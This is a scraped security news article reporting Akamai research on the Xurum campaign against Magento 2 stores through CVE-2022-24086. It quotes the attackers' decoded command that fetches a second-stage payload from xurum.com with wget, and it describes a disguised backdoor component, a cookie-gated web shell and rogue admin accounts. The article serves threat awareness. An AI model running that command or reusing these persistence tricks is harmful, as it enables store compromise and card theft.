# Ongoing Xurum attacks target Magento 2 e-stores
## Experts warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites using Adobe’s Magento 2 CMS. Akamai researchers warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites running the Magento 2 CMS. The attackers are actively exploiting a server-side template injection issue, tracked as CVE-2022-24086, (CVSS score: 9.8), in Adobe Commerce and Magento Open Source. The […]
## Information:

+ Link: https://securityaffairs.com/149509/cyber-crime/xurum-adobes-magento-2-attacks.html
+ Source: Security Affairs
+ Author: Pierluigi Paganini
+ Date published: 14 August 2023, 17:46
+ Date scraped: 14 August 2023, 19:01

## Article:
![Main article image](https://i0.wp.com/securityaffairs.com/wp-content/uploads/2023/08/image-24.png?resize=300%2C300&ssl=1)



## Experts warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites using Adobe’s Magento 2 CMS.


Akamai researchers warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites running the Magento 2 CMS.


The attackers are actively exploiting a server-side template injection issue, tracked as [CVE-2022-24086](https://nvd.nist.gov/vuln/detail/CVE-2022-24086), (CVSS score: 9.8), in Adobe Commerce and Magento Open Source.


The name Xurum comes from the domain name of the attacker’s command and control (C2) server.


The campaign is active since at least January 2023, threat actors seem to be interested in payment stats from the orders in the victim’s Magento store placed in the past 10 days.


In some cases, the attackers also deployed a software skimmer to capture credit card information and transmit it to a remote server.


Evidence gathered by the researchers suggests the attacks were carried out by a Russian threat actor.


The server xurum.com is physically located in the Netherlands and hosted by the Russian hosting company called VDSina.ru.


[![Xurum Magento 2](https://i0.wp.com/securityaffairs.com/wp-content/uploads/2023/08/image-24.png?resize=1024%2C616&ssl=1)](https://i0.wp.com/securityaffairs.com/wp-content/uploads/2023/08/image-24.png?ssl=1)



The attackers were observed attempting to execute two distinct payloads from a total of four IP addresses associated with the infrastructure of Hetzner and Shock Hosting hosting providers.


The first variant of the payload executes the “*file\_get\_contents*” PHP function to send a request to the C2 (*xurum.com*) to determine whether the server is vulnerable to CVE-2022-24086.


The second variant is the second-stage PHP payload that is downloaded and executed by the attackers, it is hosted on the same *xurum.com* server. 


*“**To evade detection, the exploit segment responsible for downloading and executing the remote malicious PHP code is obfuscated using Base64 encoding and executed via the “shell\_exec” PHP function** (Figure 3). The obfuscated part decodes to **php -r “`wget -qO**– <https://xurum.com/b.txt>`;”.” reads the [analysis](https://www.akamai.com/blog/security-research/new-sophisticated-magento-campaign-xurum-webshell) published by Akamai.*



The researchers reported that the attackers register a new Magento component and mask it as “GoogleShoppingAds.” The threat actors were observed using an advanced web shell named “wso-ng” that is activated only when the attacker sends the cookie “magemojo000” to the backdoor “GoogleShoppingAds” component.


According to the author, wso-ng is a new version of the WSO webshell.


The web shell login page masquerades as an error page containing a hidden login form that attempts to siphon victim credentials.


The attackers were observed creating a backdoor admin user in Magento, named “mageplaza” or “mageworx.” These attackers used these two names because they are also the names of the popular Magento extensions stores.


Akamai researchers also observed on the xurum.com server a public exploit the [CVE-2016-5195](https://securityaffairs.com/52521/hacking/dirty-cow-exploit.html), aka Dirty COW, for Linux local privilege escalation,


*“The attackers have shown a meticulous approach, targeting specific Magento 2 instances rather than indiscriminately spraying their exploits across the internet. They demonstrate a high level of expertise in Magento and invest considerable time in understanding its internals, setting up attack infrastructure, and testing their exploits on real targets.” concludes the report. “**This campaign serves as a practical example of how older vulnerabilities continue to be exploited years after disclosure**, as businesses struggle to keep up with patches and security measures.”*


The report also includes indicators of compromise (IOCs).


Follow me on Twitter: [**@securityaffairs**](https://twitter.com/securityaffairs) and [**Facebook**](https://www.facebook.com/sec.affairs) and [**Mastodon**](https://infosec.exchange/@securityaffairs)


[**Pierluigi Paganini**](http://www.linkedin.com/pub/pierluigi-paganini/b/742/559)


**(**[**SecurityAffairs**](http://securityaffairs.co/wordpress/)**–** **hacking, Xurum** **Magento attacks)**




  


---


  




## Tags:
***CVE's***: CVE-2016-5195 CVE-2022-24086
***urls***: https://xurum.com/b.txt`

### Autogenerated tags:
[[magento]] [[php]] [[xurum]] [[xurum.com]]
